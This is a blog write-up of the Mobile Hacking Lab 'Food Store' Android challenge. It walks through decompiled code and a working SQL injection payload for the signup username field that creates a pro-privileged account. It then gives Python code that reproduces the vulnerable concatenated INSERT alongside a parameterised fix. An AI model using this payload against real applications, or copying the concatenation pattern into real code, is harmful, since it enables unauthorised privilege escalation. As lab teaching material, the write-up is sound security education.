⚡ Stray Voltage

Food Store (Mobile Hacking Lab)

This writeup details the solution to the Food Store challenge available here:

https://www.mobilehackinglab.com

The lab requires static analysis of the APK to identify a SQL injection vulnerability in the user registration flow. Because the registration INSERT is built by string concatenation, a crafted username lets us sign up at a higher privilege level than the app intends.

App Exploration

Initially running the app brings us to a login screen, but we can also sign up:

image

The challenge description states that new accounts get regular status on sign up; our goal is to become a pro user.

Let's sign up with some basic details:

image

Once logged in we can see some menu items.

image

Note that I should be able to see my user level in the app banner; it isn't working for me here.

APK Analysis

Let's look at the APK with jadx-gui.

In the Signup class we can see the code that collects the user input, builds a User object and then calls dbHelper.addUser(newUser):

// [...SNIP...]
// obj, obj2 and editText2 hold the three registration form fields (username, password, address).
// isPro is explicitly passed as false; the trailing "1, null" are Kotlin's synthetic
// default-argument bitmask and DefaultConstructorMarker (bit 0 set means id takes its default of 0).
User newUser = new User(0, obj, obj2, editText2.getText().toString(), false, 1, null);
dbHelper.addUser(newUser);
Toast.makeText(this$0, "User Registered Successfully", 0).show();
return;

Let's look at the DBHelper class and the addUser method:

public final void addUser(User user) {
    Intrinsics.checkNotNullParameter(user, "user");
    SQLiteDatabase db = getWritableDatabase();
    // Password and address are base64 encoded (not hashed) before being stored.
    byte[] bytes = user.getPassword().getBytes(Charsets.UTF_8);
    Intrinsics.checkNotNullExpressionValue(bytes, "this as java.lang.String).getBytes(charset)");
    String encodedPassword = Base64.encodeToString(bytes, 0);
    // The username is used exactly as typed.
    String Username = user.getUsername();
    byte[] bytes2 = user.getAddress().getBytes(Charsets.UTF_8);
    Intrinsics.checkNotNullExpressionValue(bytes2, "this as java.lang.String).getBytes(charset)");
    String encodedAddress = Base64.encodeToString(bytes2, 0);
    // The INSERT is assembled by string concatenation; isPro is hard-coded to 0 as the last column.
    String sql = "INSERT INTO users (username, password, address, isPro) VALUES ('" + Username + "', '" + encodedPassword + "', '" + encodedAddress + "', 0)";
    db.execSQL(sql);   // executed as raw SQL, no parameter binding
    db.close();
}

The password and address values are base64 encoded before they reach the statement, so whatever we type there can only contain base64 characters and can never close the surrounding quotes. The username, however, is concatenated into the SQL string unsanitised and executed with execSQL rather than a parameterised insert. We can also see that isPro is hard-coded to 0 as the final column of the INSERT, which means a username that closes the open quote and the VALUES list early lets us supply our own isPro value.

Exploitation

To exploit this we need a username that closes the open string literal, completes the VALUES list with our own password, address and isPro values, and terminates the statement so the remainder of the app's query is never parsed. The two base64 values below are "test", so the password we later log in with is test. Note that // is not a comment in SQLite; the payload works because Android's execSQL compiles only the first statement and ignores everything after the ;:

strayvoltage','dGVzdA==','dGVzdA==',1);//

image

When selecting sign up we get the "User Registered Successfully" toast. Logging in with strayvoltage:test gets us a successful login:

image

Unfortunately I cannot see the banner mentioned earlier, which would show that we are a pro user. To get around this we can go to /data/data/com.mobilehackinglab.foodstore/databases on the device and download userdatabase.db. Viewing the users table shows that the strayvoltage user has isPro set to 1.

image
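To make the injection and its fix concrete, here is an added example (my own code, not part of the challenge app or the original writeup). It rebuilds the addUser concatenation from the decompiled DBHelper in Python against an in-memory SQLite database, runs the strayvoltage payload, checks isPro the same way we did by pulling userdatabase.db, and then shows the parameterised INSERT that closes the hole. The users table schema is constructed for the example (only the four columns named in the INSERT). One client difference matters: Python's sqlite3 module refuses a statement with trailing text after the ;, whereas Android's execSQL silently drops it, so the in-Python run uses the equivalent payload that ends with SQLite's -- comment instead of ;//.

```python
import base64
import sqlite3

# Constructed schema: only the columns the app's INSERT names.
SCHEMA = "CREATE TABLE users (username TEXT, password TEXT, address TEXT, isPro INTEGER)"

# The writeup's payload (works on Android because execSQL compiles only the first
# statement) and an equivalent that ends in an SQLite comment, usable from any client.
PAYLOAD_ANDROID = "strayvoltage','dGVzdA==','dGVzdA==',1);//"
PAYLOAD_SQLITE = "strayvoltage','dGVzdA==','dGVzdA==',1)--"


def b64(value: str) -> str:
    """Stand-in for Base64.encodeToString(bytes, 0) on short inputs.
    (Android's DEFAULT flags also line-wrap and append a newline; that does not
    affect the injection, so it is omitted here.)"""
    return base64.b64encode(value.encode("utf-8")).decode("ascii")


def build_insert(username: str, password: str, address: str) -> str:
    """Reproduce DBHelper.addUser's string concatenation verbatim."""
    return ("INSERT INTO users (username, password, address, isPro) VALUES ('"
            + username + "', '" + b64(password) + "', '" + b64(address) + "', 0)")


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def add_user_vulnerable(conn: sqlite3.Connection, username: str, password: str, address: str) -> None:
    """Vulnerable: raw SQL built from user input, like db.execSQL(sql)."""
    conn.execute(build_insert(username, password, address))


def add_user_fixed(conn: sqlite3.Connection, username: str, password: str, address: str) -> None:
    """Fixed: parameter binding; the username can never escape its string literal.
    (Base64 is still only encoding; a real fix would hash the password too.)"""
    conn.execute(
        "INSERT INTO users (username, password, address, isPro) VALUES (?, ?, ?, 0)",
        (username, b64(password), b64(address)),
    )


def is_pro(conn: sqlite3.Connection, username: str):
    """Same check we did by hand on userdatabase.db: None if no such user, else isPro."""
    row = conn.execute("SELECT isPro FROM users WHERE username = ?", (username,)).fetchone()
    return None if row is None else row[0]


def python_rejects_trailing_sql() -> bool:
    """Python's sqlite3 raises on the ';//' payload (older versions raise sqlite3.Warning,
    newer ones ProgrammingError), unlike Android's execSQL which ignores the tail."""
    conn = fresh_db()
    try:
        add_user_vulnerable(conn, PAYLOAD_ANDROID, "test", "test")
    except (sqlite3.Error, sqlite3.Warning):
        return True
    return False


def demo() -> dict:
    vuln = fresh_db()
    add_user_vulnerable(vuln, PAYLOAD_SQLITE, "test", "test")
    fixed = fresh_db()
    add_user_fixed(fixed, PAYLOAD_SQLITE, "test", "test")
    return {
        "statement_android_runs": build_insert(PAYLOAD_ANDROID, "test", "test").split(";")[0],
        "vulnerable_isPro": is_pro(vuln, "strayvoltage"),          # 1: we registered as pro
        "fixed_isPro_for_strayvoltage": is_pro(fixed, "strayvoltage"),  # None: no such user
        "fixed_isPro_for_literal_payload": is_pro(fixed, PAYLOAD_SQLITE),  # 0: payload stored as text
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The vulnerable path stores exactly the row we saw in userdatabase.db (isPro = 1), while the parameterised version stores the whole payload as a harmless username with isPro = 0. The same rule applies on Android: use SQLiteDatabase.insert with ContentValues or execSQL with bindArgs, never concatenation.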